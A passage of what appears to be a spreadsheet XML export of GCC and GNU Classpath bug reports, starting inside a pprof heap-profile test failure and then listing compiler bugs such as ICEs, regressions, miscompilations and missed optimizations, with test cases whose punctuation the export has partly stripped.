time/go-main.c:40
		#	0x3fff74ac92b
		#	0x80006a15
		0: 0 [0: 0] @ 0x800250a9 0x800250a9 0x8001163f 0x80011687 0x80009025 0x80007949 0x8000c609 0x800ad279 0x8001e229
		#	0x80009025	pprof.writeHeap+0x8d			/home/vogt/src/git/gcc/build-go/s390x-ibm-linux-gnu/libgo/gotest81795/test/pprof.go:401
		#	0x80007949	runtime_pprof.WriteTo.pN21_runtime_pprof.Profile+0x99	/home/vogt/src/git/gcc/build-go/s390x-ibm-linux-gnu/libgo/gotest81795/test/pprof.go:229
		#	0x8000c609	runtime_pprof_test.TestMemoryProfiler+0x191		/home/vogt/src/git/gcc/build-go/s390x-ibm-linux-gnu/libgo/gotest81795/test/mprof_test.go:71
		#	0x800ad279	testing.$thunk15+0xc9			../../../libgo/go/testing/testing.go:555
		#	0x8001e229	kickoff+0x41				../../../libgo/runtime/proc.c:235
		0: 0 [0: 0] @ 0x800250a9 0x800250a9 0x80008fd3 0x80007949 0x8000c609 0x800ad279 0x8001e229
		#	0x80008fd3	pprof.writeHeap+0x3b			/home/vogt/src/git/gcc/build-go/s390x-ibm-linux-gnu/libgo/gotest81795/test/pprof.go:388
		#	0x80007949	runtime_pprof.WriteTo.pN21_runtime_pprof.Profile+0x99	/home/vogt/src/git/gcc/build-go/s390x-ibm-linux-gnu/libgo/gotest81795/test/pprof.go:229
		#	0x8000c609	runtime_pprof_test.TestMemoryProfiler+0x191		/home/vogt/src/git/gcc/build-go/s390x-ibm-linux-gnu/libgo/gotest81795/test/mprof_test.go:71
		#	0x800ad279	testing.$thunk15+0xc9			../../../libgo/go/testing/testing.go:555
		#	0x8001e229	kickoff+0x41				../../../libgo/runtime/proc.c:235
		0: 0 [0: 0] @ 0x800250a9 0x800250a9 0x8001134d 0x80006ecf 0x8000c5e1 0x800ad279 0x8001e229
		#	0x800ad279	testing.$thunk15+0xc9	../../../libgo/go/testing/testing.go:555
		#	0x8001e229	kickoff+0x41		../../../libgo/runtime/proc.c:235
		0: 0 [0: 0] @ 0x800250a9 0x800250a9 0x80011821 0x800112cf 0x80006c03 0x80006ea3 0x8000c5e1 0x800ad279 0x8001e229
		#	0x80006c03	pprof.lockProfiles+0x103		/home/vogt/src/git/gcc/build-go/s390x-ibm-linux-gnu/libgo/gotest81795/test/pprof.go:90
		#	0x80006ea3	runtime_pprof.Lookup+0x23		/home/vogt/src/git/gcc/build-go/s390x-ibm-linux-gnu/libgo/gotest81795/test/pprof.go:127
		#	0x8000c5e1	runtime_pprof_test.TestMemoryProfiler+0x169	/home/vogt/src/git/gcc/build-go/s390x-ibm-linux-gnu/libgo/gotest81795/test/mprof_test.go:71
		#	0x800ad279	testing.$thunk15+0xc9			../../../libgo/go/testing/testing.go:555
		#	0x8001e229	kickoff+0x41				../../../libgo/runtime/proc.c:235
		0: 0 [0: 0] @ 0x800250a9 0x800250a9 0x80011c07 0x800112a9 0x80006c03 0x80006ea3 0x8000c5e1 0x800ad279 0x8001e229
		#	0x80006c03	pprof.lockProfiles+0x103		/home/vogt/src/git/gcc/build-go/s390x-ibm-linux-gnu/libgo/gotest81795/test/pprof.go:90
		#	0x80006ea3	runtime_pprof.Lookup+0x23		/home/vogt/src/git/gcc/build-go/s390x-ibm-linux-gnu/libgo/gotest81795/test/pprof.go:127
		#	0x8000c5e1	runtime_pprof_test.TestMemoryProfiler+0x169	/home/vogt/src/git/gcc/build-go/s390x-ibm-linux-gnu/libgo/gotest81795/test/mprof_test.go:71
		#	0x800ad279	testing.$thunk15+0xc9			../../../libgo/go/testing/testing.go:555
		#	0x8001e229	kickoff+0x41				../../../libgo/runtime/proc.c:235
		0: 0 [0: 0] @ 0x800250a9 0x800250a9 0x80011be3 0x800112a9 0x80006c03 0x80006ea3 0x8000c5e1 0x800ad279 0x8001e229
		#	0x80006c03	pprof.lockProfiles+0x103		/home/vogt/src/git/gcc/build-go/s390x-ibm-linux-gnu/libgo/gotest81795/test/pprof.go:90
		#	0x80006ea3	runtime_pprof.Lookup+0x23		/home/vogt/src/git/gcc/build-go/s390x-ibm-linux-gnu/libgo/gotest81795/test/pprof.go:127
		#	0x8000c5e1	runtime_pprof_test.TestMemoryProfiler+0x169	/home/vogt/src/git/gcc/build-go/s390x-ibm-linux-gnu/libgo/gotest81795/test/mprof_test.go:71
		#	0x800ad279	testing.$thunk15+0xc9			../../../libgo/go/testing/testing.go:555
		#	0x8001e229	kickoff+0x41				../../../libgo/runtime/proc.c:235
		# runtime.MemStats
		# Alloc = 25574936
		# TotalAlloc = 29809488
		# Sys = 35420408
		# Lookups = 11
		# Mallocs = 7276
		# Frees = 3243
		# HeapAlloc = 25574936
		# HeapSys = 30408704
		# HeapIdle = 4521984
		# HeapInuse = 25886720
		# HeapReleased = 0
		# HeapObjects = 4033
		# Stack = 0 / 0
		# MSpan = 9472 / 49152
		# MCache = 2200 / 16384
		# BuckHashSys = 1540888
		# NextGC = 50917776
		# PauseNs = [85000 94000 9200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 NumGC = 3
		# EnableGC = true
		# DebugGC = false
FAIL
FAIL: runtime/pprof
make[3]: *** [runtime/pprof/check] Error 1</t>
  </si>
  <si>
    <t>CLASSPATH-22961</t>
  </si>
  <si>
    <t>awt: GridBagLayout.addLayoutComponent throws IllegalArgumentException</t>
  </si>
  <si>
    <t xml:space="preserve">Steps to reproduce:
1. Compile and run the attached testcase
Expected results (sun's java 1.5.0):
1. A window shows up. It has filechooser components and label0 below them.
Actual results (classpath 2005-05-30):
1. No window is shown and the following exception is thrown:
java.lang.IllegalArgumentException
   at java.awt.GridBagLayout.addLayoutComponent (GridBagLayout.java:132)
   at java.awt.Container.addImpl (Container.java:382)
   at java.awt.Container.add (Container.java:290)
   at gridbag. (gridbag.java:11)
   at gridbag.main (gridbag.java:6)
Testcase:
import javax.swing.*
import java.io.*
import java.awt.BorderLayout
public class gridbag extends JFrame {
        public static void main(String[] args) {
                (new gridbag()).show()
        }
        public gridbag() {
                JFileChooser fileChooser = new JFileChooser()
                JLabel label = new JLabel(label0)
                fileChooser.add(label BorderLayout.SOUTH)
                fileChooser.showOpenDialog(this)
        }
}
I am not sure if this is a bug.  http://java.sun.com/j2se/1.4.2/docs/api/java/awt/GridBagLayout.html#addLayoutComponent(java.awt.Component java.lang.Object) suggests that the exception must be thrown but sun's own java does not seem to do that. Should we
1) make classpath not throw the exception and violate the javadoc
or
2) try to fix all free software projects that depend on the incorrect behavior?
</t>
  </si>
  <si>
    <t>GCC-55818</t>
  </si>
  <si>
    <t>Reading a REAL from a file which doesn't end in a new line fails</t>
  </si>
  <si>
    <t>Reported by Elzbieta Burnett at
https://groups.google.com/d/msg/comp.lang.fortran/_HBMfv1lR3w/7b28oDQH2sUJ
The following program works for INTEGER but not for REAL. See also c.l.f for a similar example.
The file looks like 1\n2\n3 without a \n after the 3. That fails for list-directed read.
implicit none
integer :: stat
!integer :: var ! &lt;&lt; works
real    :: var ! &lt;&lt; fails
open(99 file=test.dat access=stream form=unformatted status=new)
write(99) 1 new_line()
write(99) 2 new_line()
write(99) 3
close(99)
open(99 file=test.dat)
read (99* iostat=stat) var
if (stat /= 0 .or. var /= 1) call abort()
read (99* iostat=stat) var
if (stat /= 0 .or. var /= 2) call abort()
read (99* iostat=stat) var              ! &lt;&lt; FAILS: stat /= 0
if (stat /= 0 .or. var /= 3) call abort() ! &lt;&lt; aborts here
close(99 status=delete)
end</t>
  </si>
  <si>
    <t>GCC-8497</t>
  </si>
  <si>
    <t>traditional preprocessor #if/#endif bug</t>
  </si>
  <si>
    <t>With -traditional the following test case yields
setup.S:293: unterminated #ifndef
Without -traditional things work as expected.
Release:
3.3 20020923
Environment:
i686-pc-linux-gnu
How-To-Repeat:
make with the provided Makefile.</t>
  </si>
  <si>
    <t>GCC-62012</t>
  </si>
  <si>
    <t>Loop is not vectorized after function inlining (SCEV)</t>
  </si>
  <si>
    <t>We noticed that for one important benchmark using '-lto' options leads to performance degradation which is caused by not-vectorizing the hottest loop after function inlining. I can able to reproduce this deficiency using simple test-case:
if we passed class by reference to function (it need to be compiled with -DPARAM macros) loop is vectorized:
g++ -Ofast -m64 -march=core-avx2 -c test.cpp  -fdump-tree-vect-details -fopenmp -DPARAM grep 'note: vectorized' test.cpp.114t.vect                                                                   
test.cpp:45:1: note: vectorized 1 loops in function.
But if we compile it without macros we get:
g++ -Ofast -m64 -march=core-avx2 -c test.cpp  -fdump-tree-vect-details -fopenmp grep 'note: vectorized' test.cpp.114t.vect
test.cpp:45:1: note: vectorized 0 loops in function.
It looks like SCEV issue.</t>
  </si>
  <si>
    <t>GCC-2905</t>
  </si>
  <si>
    <t>Wrong warning cast when using vector class</t>
  </si>
  <si>
    <t>Compiling the attached file with optimization
and Wall makes the compiler cast a wrong warning.
Release:
gcc version 2.95.2
Environment:
OSF1 V4.0 1229 alpha alpha
How-To-Repeat:
gcc -c -O3 -Wall EvilCompiler.cc</t>
  </si>
  <si>
    <t>sante</t>
  </si>
  <si>
    <t>GCC-53470</t>
  </si>
  <si>
    <t>[4.8 Regression] ICE when linking with -g in splice_child_die at dwarf2out.c:4264</t>
  </si>
  <si>
    <t>Created attachment 27487
real-life code preprocessed file
I encountered this while compiling with -g just few files in my project.
make propagated the -g to the linking step that included also object files previously compiled without -g.
The example below reproduces the error with just one file
c++ -flto -O2 -fPIC iceDebug.ii -shared -c -std=gnu++11 -msse3
[vocms123] /build/vin/newb/CMSSW_6_0_X_2012-05-14-1400 $ c++ -g -flto -O2 -fPIC iceDebug.o -shared -o bha.so -std=gnu++11 -msse3
In file included from /build/ge/new-binutils/a/slc5_amd64_gcc470/external/boost/1.49.0-cms3/include/boost/checked_delete.hpp:51:0
                 from :322:
/build/ge/new-binutils/a/slc5_amd64_gcc470/external/boost/1.49.0-cms3/include/boost/smart_ptr/detail/sp_counted_impl.hpp: In member function 'get_deleter':
/build/ge/new-binutils/a/slc5_amd64_gcc470/external/boost/1.49.0-cms3/include/boost/smart_ptr/detail/sp_counted_impl.hpp:84:5: internal compiler error: in splice_child_die at dwarf2out.c:4264
     }
     ^
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
lto-wrapper: c++ returned 1 exit status
/afs/cern.ch/user/i/innocent/w3/gcc47slc5/bin/ld: fatal error: lto-wrapper failed
collect2: error: ld returned 1 exit status
happens in many other contexts always at dwarf2out.c:4264
cc version 4.8.0 20120524 (experimental) [trunk revision 187822] (GCC) 
GNU gold (GNU Binutils 2.22.52.20120515) 1.11</t>
  </si>
  <si>
    <t>GCC-49559</t>
  </si>
  <si>
    <t>[C++0x] stable_sort calls self-move-assignment operator</t>
  </si>
  <si>
    <t>$ cat t.cc
#include 
#include 
#include 
struct MyMoveClass
{
    int val_
    explicit MyMoveClass( int val = 0 )
      : val_( val )
    {
      std::cout &lt;&lt; ctr this= &lt;&lt; this &lt;&lt; std::endl
    }
    MyMoveClass( MyMoveClass const&amp; rhs )
      : val_( rhs.val_ )
    {
      std::cout &lt;&lt; ctr copy this= &lt;&lt; this &lt;&lt;  rhs= &lt;&lt; 
    }
    MyMoveClass( MyMoveClass &amp;&amp; rhs )
      : val_( rhs.val_ )
    {
      std::cout &lt;&lt; ctr move this= &lt;&lt; this &lt;&lt;  rhs= &lt;&lt; 
      rhs.val_ = 0
    }
    MyMoveClass&amp; operator=( MyMoveClass &amp;&amp; rhs )
    {
      std::cout &lt;&lt; assign move this= &lt;&lt; this &lt;&lt;  rhs= &lt;&lt; 
      assert( this != 
      val_ = rhs.val_
      rhs.val_ = 0
      return *this
    }
    MyMoveClass&amp; operator=( MyMoveClass const&amp; rhs )
    {
      std::cout &lt;&lt; assign copy this= &lt;&lt; this &lt;&lt;  rhs= &lt;&lt; 
      val_ = rhs.val_
      return *this
    }
    ~MyMoveClass()
    {
      std::cout &lt;&lt; dtr this= &lt;&lt; this &lt;&lt; std::endl
    }
    bool operator&lt;( MyMoveClass const&amp; rhs ) const
    {
      return val_ &lt; rhs.val_
    }
}
int main()
{
  MyMoveClass v(5)
  std::stable_sort( 
  return 0
}
$ g++ -std=gnu++0x -o t t.cc
$ ./t
ctr this=0xbfe1730c
ctr move this=0x8afd008 rhs=0xbfe1730c
assign move this=0xbfe1730c rhs=0x8afd008
assign move this=0xbfe1730c rhs=0xbfe1730c
template: template.cc:31: MyMoveClass&amp; MyMoveClass::operator=(MyMoveClass&amp;&amp;): Assertion `this != &amp;rhs' failed.
From DR 1204: Additionally this clarifies that move assignment operators need not perform the traditional if (this != &amp;rhs) test commonly found (and needed) in copy assignment operators.
Note that std::sort() calls no copy constructor or assignment operator at all.  Seems sensible when there is only one element.</t>
  </si>
  <si>
    <t>GCC-38972</t>
  </si>
  <si>
    <t>Failed constant folding and propagation in arithmetic expression.</t>
  </si>
  <si>
    <t>The following code is expected to print 1.
However with -O1 or -O2 option it prints 2. 
(-O0 option yields the correct output 1.)
--------------------------------------------
Source code:
   #include 
   int main (void)
   {
      int test=1
      volatile int a = 1
      test += (0 == a)         
      test += ((test + test) &lt;= -69)
      printf(%d\ntest)
      return 0
   }   
--------------------------------------------	
Compiler command line: gcc -O1 gcc -O2
--------------------------------------------
Expected results: 1
--------------------------------------------
Observed results: 2
-------------------------------------------------------------
gcc -v output:
   Reading specs from /usr/lib/gcc/i686-pc-cygwin/3.4.4/specs
   Configured with:
   /usr/build/package/orig/test.respin/gcc-3.4.4-3/configure
   --verbose --prefix=/usr
   --exec-prefix=/usr --sysconfdir=/etc --libdir=/usr/lib
   --libexecdir=/usr/lib --mandir=/usr/share/man
   --infodir=/usr/share/info
   --enable-languages=cadac++df77pascaljavaobjc
   --enable-nls
   --without-included-gettext
   --enable-version-specific-runtime-libs --without-x
   --enable-libgcj --disable-java-awt
   --with-system-zlib --enable-interpreter
   --disable-libgcj-debug --enable-threads=posix
   --enable-java-gc=boehm
   --disable-win32-registry --enable-sjlj-exceptions
   --enable-hash-synchronization --enable-libstdcxx-debug
   Thread model: posix
   gcc version 3.4.4
   (cygming special gdc 0.12 using dmd 0.125)
-------------------------------------------------------------</t>
  </si>
  <si>
    <t>hironobu.awazu</t>
  </si>
  <si>
    <t>GCC-8417</t>
  </si>
  <si>
    <t>g++ 3.2 generating different (and incorrect?) code from g++ 2.95.4</t>
  </si>
  <si>
    <t>Greetings Compiler World.
I believe there is an error in the g++ 3.2 compiler that is not
present in the 2.95.4 compiler.  (Unfortunately because of the
complexity of the code involved I am not able to narrow this
down to a stand alone code junk.  Hopefully the information
I can provide will help resolve the issue.)
Version Info:
	Reading specs from /data3/germain/gcc/lib/gcc-lib/i686-pc-linux-gnu/3.2/specs
	Configured with: ./configure --prefix=/data3/germain/gcc
	Thread model: posix
	gcc version 3.2
System: Linux (Debian)
The behavior that I am getting is that during a call to a superclass
constructor the value of 'this' is different between the two calls. 
Consider the following code:
	// a function that simply calls the memory type constructor
 	// with the passed in or computed size of the object.
	object_type::object_type( size_t s ) :
	    memory_block_type( s ? s : sizeof( object_type ) )
	{
	}	
	memory_block_type::memory_block_type(size_t size)
	{
	  memset( this 0 size )  // clear memory
	  memory_size = size       // set size field
	}
under g++ 3.2 using gdb I find that the value of 'this' in the
object_type constructor (and all sub class constructors for that
matter) is correct and consistent.  The call to the memory_block_type
constructor shows a value of 'this' 4 bytes offset from the proper
value.  see below (where I am stepping down the stack list of
constructors.  in each case the value of this is consistent until I
get to the final call to memory_block_type where it is 4 larger. (FYI
that the object_type is a super class of a list object which is
a super class for an attirubte class which is a super class for
a point class.)).
	(gdb)
	#4  0x0817ea6c in pt_obj (this=0x8c16d69) at /data1/germain/alpha1/src/lib/object/pt_ctors.C:73
	(gdb) down
	#3  0x08522a4f in attr_obj (this=0x8c16d69 s=80) at /data1/germain/alpha1/src/kernel/lib/alpha1/support/attr.C:19
	(gdb) down
	#2  0x08515667 in list_obj (this=0x8c16d69 s=80) at /data1/germain/alpha1/src/kernel/lib/alpha1/boot/list.C:23
	(gdb) down
	#1  0x0851a5de in object_type (this=0x8c16d69 s=80) at /data1/germain/alpha1/src/kernel/lib/alpha1/boot/object.C:25
	(gdb) down
	#0  memory_block_type (this=0x8c16d6d size=80 this_check=0x8c16d69) at /data1/germain/alpha1/src/kernel/lib/alpha1/boot/memory_block.C:200
using g++ 2.95.4 the value of 'this' is consistent for all calls.
Here is the relevant assembly generated by the 2.95.4 compiler and the 3.2
compiler (disassembled via gdb).
2.95.4  (correct code  (?))
	0x8542340 :		push   %ebp
	0x8542341 :	mov    %esp%ebp
	0x8542343 :	sub    $0x14%esp
	0x8542346 :	push   %ebx
	0x8542347 :	mov    0x8(%ebp)%ebx
	0x854234a :	add    $0xfffffffc%esp
	0x854234d :	push   %ebx
	0x854234e :	mov    0xc(%ebp)%eax
	0x8542351 :	cmpl   $0x00xc(%ebp)
	0x8542355 :	jne    0x854235c 
	0x8542357 :	mov    $0x1c%eax
	0x854235c :	push   %eax
	0x854235d :	push   %ebx
	0x854235e :	call   0x853ea18 
3.2    (code showing bad behavior)
	0x851a5a8 :	push   %ebp
	0x851a5a9 :	mov    %esp%ebp
	0x851a5ab :	push   %ebx
	0x851a5ac :	sub    $0x24%esp
	0x851a5af :	mov    0x8(%ebp)%eax
	0x851a5b2 :	add    $0x4%eax
	0x851a5b5 :	mov    %eax(%esp1)
	0x851a5b8 :	mov    0xc(%ebp)%eax
	0x851a5bb :	mov    %eax0xfffffff8(%ebp)
	0x851a5be :	cmpl   $0x00xc(%ebp)
	0x851a5c2 :	jne    0x851a5cb 
	0x851a5c4 :	movl   $0x1c0xfffffff8(%ebp)
	0x851a5cb :	mov    0xfffffff8(%ebp)%eax
	0x851a5ce :	mov    %eax0x4(%esp1)
	0x851a5d2 :	mov    0x8(%ebp)%eax
	0x851a5d5 :	mov    %eax0x8(%esp1)
	0x851a5d9 :	call   0x8516e70 
i'm not an expert on the assembly codes but i'm concerned by that add
command adding 4 to the eax register.
Release:
g++ 3.2
Environment:
linux
How-To-Repeat:
see description. (but briefly its buried deep in a complex system and i'm not 
able to get a stand alone version...)</t>
  </si>
  <si>
    <t>germain</t>
  </si>
  <si>
    <t>GCC-39237</t>
  </si>
  <si>
    <t>Overloaded Operator delete not called</t>
  </si>
  <si>
    <t>Hello
We use a unit testing framework which overloads operator new and operator delete to track memory allocations and detect leaks.  According to it vector's push_back method allocates memory through operator new but does not release it through operator delete.
I am not sure if this is because the memory is not released is not released through delete or that the overloaded operator is simply not called.
The simple test case is as follows
----
#include 
#include 
int main (int argc char ** argv) 
{
  {
        std::vector objects
        objects.push_back(1)
  }
  return 0
}
static int allocatedBlocks = 0
void* operator new(size_t size)
{
        allocatedBlocks++
        void * toReturn = malloc(size)
        std::cerr &lt;&lt; operator new(size =  &lt;&lt; size 
                  &lt;&lt; ) returns:  &lt;&lt; toReturn 
                  &lt;&lt;  allocatedBlocks:  &lt;&lt; allocatedBlocks &lt;&lt; std::endl
        return toReturn
}
void operator delete(void* mem)
{
        if(mem == NULL)
          return
        allocatedBlocks--
        std::cerr &lt;&lt; operator delete(mem =  &lt;&lt; mem &lt;&lt; ) allocatedBlocks:  &lt;&lt; allocatedBlocks &lt;&lt; std::endl
        free(mem)
}
-----
Using gcc 3.2.3 running this program yields the following output:
operator new(size = 320) returns: 0x503010 allocatedBlocks: 1
Using gcc 4.1.2 I get the expected:
operator new(size = 4) returns: 0x503010 allocatedBlocks: 1
operator delete(mem = 0x503010) allocatedBlocks: 0
I read in the FAQ that containers save memory for later re-use but shouldn't it be released when the vector goes out of scope? 
Please see the preprocessed source (attached) and the g++ information below.
--------------
/home/riouxc/temp&gt; g++ -v -save-temps simple_vector.cpp 
Reading specs from /isv/gnu/bin/../lib/gcc-lib/x86_64-redhat-linux/3.2.3/specs
Configured with: ../configure --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --enable-shared --enable-threads=posix --disable-checking --with-system-zlib --enable-__cxa_atexit --enable-languages=cc++ --disable-libgcj --host=x86_64-redhat-linux
Thread model: posix
gcc version 3.2.3 20030502 (Red Hat Linux 3.2.3-47.3)
 /isv/gnu/bin/../lib/gcc-lib/x86_64-redhat-linux/3.2.3/cpp0 -lang-c++ -D__GNUG__=3 -D__DEPRECATED -D__EXCEPTIONS -v -iprefix /isv/gnu/bin/../lib/gcc-lib/x86_64-redhat-linux/3.2.3/ -D__GNUC__=3 -D__GNUC_MINOR__=2 -D__GNUC_PATCHLEVEL__=3 -D__GXX_ABI_VERSION=102 -D__ELF__ -Dunix -D__gnu_linux__ -Dlinux -D__ELF__ -D__unix__ -D__gnu_linux__ -D__linux__ -D__unix -D__linux -Asystem(posix) -D__NO_INLINE__ -D__STDC_HOSTED__=1 -D_GNU_SOURCE -Acpu=x86_64 -Amachine=x86_64 -D__x86_64 -D__x86_64__ -D__SIZE_TYPE__=unsigned long int -D__PTRDIFF_TYPE__=long int -D__tune_athlon__ -D__tune_athlon_sse__ -D__LONG_MAX__=9223372036854775807L -D__LP64__ -D_LP64 simple_vector.cpp simple_vector.ii
GNU CPP version 3.2.3 20030502 (Red Hat Linux 3.2.3-47.3) (cpplib) (x86-64 Linux/ELF)
ignoring nonexistent directory /isv/gnu/bin/../x86_64-redhat-linux/include
ignoring nonexistent directory /usr/x86_64-redhat-linux/include
ignoring duplicate directory /usr/include/c++/3.2.3
ignoring duplicate directory /usr/include/c++/3.2.3/x86_64-redhat-linux
ignoring duplicate directory /usr/include/c++/3.2.3/backward
ignoring duplicate directory /usr/lib/gcc-lib/x86_64-redhat-linux/3.2.3/include
#include ... search starts here:
#include  search starts here:
 /isv/gnu/bin/../include/c++/3.2.3
 /isv/gnu/bin/../include/c++/3.2.3/x86_64-redhat-linux
 /isv/gnu/bin/../include/c++/3.2.3/backward
 /isv/gnu/bin/../lib/gcc-lib/x86_64-redhat-linux/3.2.3/include
 /usr/local/include
 /usr/include
End of search list.
 /isv/gnu/bin/../lib/gcc-lib/x86_64-redhat-linux/3.2.3/cc1plus -fpreprocessed simple_vector.ii -quiet -dumpbase simple_vector.cpp -version -o simple_vector.s
GNU CPP version 3.2.3 20030502 (Red Hat Linux 3.2.3-47.3) (cpplib) (x86-64 Linux/ELF)
GNU C++ version 3.2.3 20030502 (Red Hat Linux 3.2.3-47.3) (x86_64-redhat-linux)
        compiled by GNU C version 3.2.3 20030502 (Red Hat Linux 3.2.3-47.3).
 as -V -Qy -o simple_vector.o simple_vector.s
GNU assembler version 2.15.92.0.2 (x86_64-redhat-linux) using BFD version 2.15.92.0.2 20040927
 /isv/gnu/bin/../lib/gcc-lib/x86_64-redhat-linux/3.2.3/collect2 --eh-frame-hdr -m elf_x86_64 -Y P/usr/lib64 -dynamic-linker /lib64/ld-linux-x86-64.so.2 /isv/gnu/bin/../lib/gcc-lib/x86_64-redhat-linux/3.2.3/../../../../lib64/crt1.o /isv/gnu/bin/../lib/gcc-lib/x86_64-redhat-linux/3.2.3/../../../../lib64/crti.o /isv/gnu/bin/../lib/gcc-lib/x86_64-redhat-linux/3.2.3/crtbegin.o -L/isv/gnu/bin/../lib/gcc-lib/x86_64-redhat-linux/3.2.3 -L/isv/gnu/bin/../lib/gcc-lib -L/usr/lib/gcc-lib/x86_64-redhat-linux/3.2.3 -L/isv/gnu/bin/../lib/gcc-lib/x86_64-redhat-linux/3.2.3/../../../../lib64 -L/isv/gnu/bin/../lib/gcc-lib/x86_64-redhat-linux/3.2.3/../../.. -L/usr/lib/gcc-lib/x86_64-redhat-linux/3.2.3/../../../../lib64 -L/usr/lib/gcc-lib/x86_64-redhat-linux/3.2.3/../../.. -L/lib/../lib64 -L/usr/lib/../lib64 simple_vector.o -lstdc++ -lm -lgcc_s -lgcc -lc -lgcc_s -lgcc /isv/gnu/bin/../lib/gcc-lib/x86_64-redhat-linux/3.2.3/crtend.o /isv/gnu/bin/../lib/gcc-lib/x86_64-redhat-linux/3.2.3/../../../../lib64/crtn.o</t>
  </si>
  <si>
    <t>caroline.rioux</t>
  </si>
  <si>
    <t>GCC-34911</t>
  </si>
  <si>
    <t>[4.3 regression] ICE with vectors of bool</t>
  </si>
  <si>
    <t>The following code snippet triggers an ICE since GCC 4.0.2:
============================================
bool foo() __attribute((vector_size(8)))
void bar()
{
  foo() 
}
============================================
bug.cc: In function 'void bar()':
bug.cc:5: internal compiler error: in same_scalar_type_ignoring_signedness at c-common.c:7203
Please submit a full bug report [etc.]
I'm not sure whether the code is valid or not GCC 3.4.[56] accepted it
but GCC 4.0.[01] rejected it.</t>
  </si>
  <si>
    <t>GCC-38151</t>
  </si>
  <si>
    <t>structures with _Complex arguments are not passed correctly</t>
  </si>
  <si>
    <t>The gcc.dg-struct-layout-1/t028 test fails at -m64 on i686-apple-darwin9. The 
failure is due to line...
TCI(2848unsigned int a_Complex int atal1 bstruct{}atpaal c[1]F(2848a4027477739U855699588U)F(2848bCINT(723419448-218144346)CINT(-1673573213131753020)))
in t028_test.h. Deleting this line allows the remaining t028 testcases to pass the execution test.</t>
  </si>
  <si>
    <t>GCC-28754</t>
  </si>
  <si>
    <t>[4.2 regression] java.lang.nullPointerException while accessing final static members of an interface</t>
  </si>
  <si>
    <t>java.lang.NullPointerException
   at java.lang.System.arraycopy(libgcj.so.7)
   at org.eclipse.jdt.internal.compiler.batch.Main.outputClassFiles(libecj.so.3)
   at org.eclipse.jdt.internal.compiler.batch.Main$1.acceptResult(libecj.so.3)
   at org.eclipse.jdt.internal.compiler.Compiler.compile(libecj.so.3)
   at org.eclipse.jdt.internal.compiler.batch.Main.performCompilation(libecj.so.3)
   at org.eclipse.jdt.internal.compiler.batch.Main.compile(libecj.so.3)
   at java.lang.reflect.Method.invoke(libgcj.so.7)
   at com.sun.tools.javac.Main.compile(javac)
   at com.sun.tools.javac.Main.main(javac)
The same thing works perfectly if javac (==ecj) was compiled with gcj 4.1.1 instead of 4.2.0.</t>
  </si>
  <si>
    <t>GCC-10773</t>
  </si>
  <si>
    <t>template method in base class not resolved</t>
  </si>
  <si>
    <t>A template method in a base class can not be resolved on the
concrete class when the concrete class has a method with
the same name.
This may be related to the missing feature mentioned in the
bug reporting instructions related to two-stages template
lookup but I have no way to know.
The following code reproduces the problem:
--------------------------------------
class arg {}
struct A
{
        template
        int f(T a) { return 10}
}
struct B : public A
{
        // Commenting out next lines uncovers the template method in the base
        // class and the program compiles and works.
        int f(int a)
}
int main()
{
        B b
        arg a
// Last statement gives this error:
        // hidden_template_member.cc: In function `int main()':
    // hidden_template_member.cc:27: error: no matching function for call to `B::f(arg&amp;)'
    // hidden_template_member.cc:14: note: candidates are: int B::f(int)
        return b.f(a)
}
Release:
g++ (GCC) 3.2.3
Environment:
debian GNU/Linux unstable (sid) intel i386</t>
  </si>
  <si>
    <t>gtg833i</t>
  </si>
  <si>
    <t>GCC-49322</t>
  </si>
  <si>
    <t>[4.7 Regression] Many libstdc++ testsuite failures</t>
  </si>
  <si>
    <t>On Linux/ia32 revision 174772 gave
FAIL: 20_util/is_copy_assignable/value.cc (test for excess errors)
FAIL: 20_util/is_move_assignable/value.cc (test for excess errors)
FAIL: 20_util/is_nothrow_move_assignable/value.cc (test for excess errors)
FAIL: 23_containers/map/modifiers/insert/2.cc (test for excess errors)
FAIL: 23_containers/map/modifiers/insert/3.cc (test for excess errors)
FAIL: 23_containers/multimap/modifiers/insert/4.cc (test for excess errors)
Revision 174765 is OK.</t>
  </si>
  <si>
    <t>GCC-51425</t>
  </si>
  <si>
    <t>[4.7 Regression] Compiler fails to produce SBIS/SBIC instructions</t>
  </si>
  <si>
    <t>Versions &lt;= 4.6 of avr-gcc produce the SBIC/SBIC (Skip one instruction if Bit in I/O is Clear/Set) but 4.7 fails to synthesize these instructions for bit numbers 0..6.
Test program:
#define PORTB (*((unsigned char volatile*) 0x38))
extern char c
void skip_1 (void)
{ 
    if (PORTB 
}
void skip_2 (void)
{ 
    if (!(PORTB 
}
Compiled with
$ avr-gcc -Os -S -dp -mmcu=atmega128 -fdump-rtl-combine-details
Output with 4.7:
skip_1:
	in r2456-0x20	   6	*movqi/4	[length = 1]
	sbrs r245	   9	*sbrx_branchqi	[length = 2]
	rjmp .L1
	sts c__zero_reg__	   11	*movqi/3	[length = 2]
.L1:
	ret	   28	return	[length = 1]
skip_2:
	in r2456-0x20	   6	*movqi/4	[length = 1]
	sbrc r245	   9	*sbrx_branchqi	[length = 2]
	rjmp .L6
	sts c__zero_reg__	   11	*movqi/3	[length = 2]
.L6:
	ret	   20	return	[length = 1]
Output with 4.6.2:
skip_1:
	sbis 56-0x205	   10	*sbix_branch	[length = 2]
	rjmp .L1
	sts c__zero_reg__	   12	*movqi/3	[length = 2]
.L1:
	ret	   22	return	[length = 1]
skip_2:
	sbic 56-0x205	   10	*sbix_branch	[length = 2]
	rjmp .L3
	sts c__zero_reg__	   12	*movqi/3	[length = 2]
.L3:
	ret	   20	return	[length = 1]
*sbix_branch is a combine pattern that is matched by 4.6:
Trying 6 -&gt; 10:
Successfully matched this instruction:
(set (pc)
    (if_then_else (eq (zero_extract:HI (mem/v:QI (const_int 56 [0x38]) [0 MEM[(volatile unsigned char *)56B]+0 S1 A8])
                (const_int 1 [0x1])
                (const_int 5 [0x5]))
            (const_int 0 [0]))
        (label_ref:HI 15)
        (pc)))
deferring deletion of insn with uid = 6.
modifying insn i3    10 pc={(zero_extract([0x38]0x10x5)==0)?L15:pc}
      REG_BR_PROB: 0xf3c
deferring rescan insn with uid = 10.
but rejected by 4.7:
Trying 6 -&gt; 9:
Failed to match this instruction:
(set (pc)
    (if_then_else (eq (zero_extract:QI (mem/v:QI (const_int 56 [0x38]) [0 MEM[(volatile unsigned char *)56B]+0 S1 A8])
                (const_int 1 [0x1])
                (const_int 5 [0x5]))
            (const_int 0 [0]))
        (label_ref:HI 14)
        (pc)))
